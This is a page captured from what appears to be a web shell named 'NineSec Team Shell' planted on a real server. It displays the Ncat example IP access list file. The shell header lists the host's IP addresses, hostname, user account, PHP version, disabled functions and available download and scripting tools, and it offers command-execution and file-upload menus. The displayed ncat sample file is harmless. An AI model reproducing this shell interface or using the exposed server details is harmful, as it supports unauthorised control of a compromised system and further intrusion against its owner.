NineSec Team Shell
Server IP : 184.107.3.203  /  Your IP : 216.73.216.51
Web Server : Apache
System : Linux dedicated2.avenfashion.com.ph 4.18.0-553.40.1.el8_10.x86_64 #1 SMP Mon Feb 10 12:11:18 EST 2025 x86_64
User : adminteladeoro ( 1015)
PHP Version : 8.2.28
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /usr/share/doc/nmap-ncat/examples/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : //usr/share/doc/nmap-ncat/examples/ipaccess
#
# This is a sample IP access list that
# could potentially be used with Ncat
# to allow or deny specific users from
# connecting to an Ncat process, such as
# a standard listen operation to being
# able to access your newly spawned SOCKS4
# server.
#
# Obviously, these IP addresses are pretty
# useless to most people. It is an example
# afterall. :)
#
# Chris Gibson, <chris@linuxops.net>

# lo interface.
127.0.0.1/8

# eth0 internal network.
192.168.0.0/24

# eth1 to outside world.
55.20.30.1/32

NineSec Team - 2022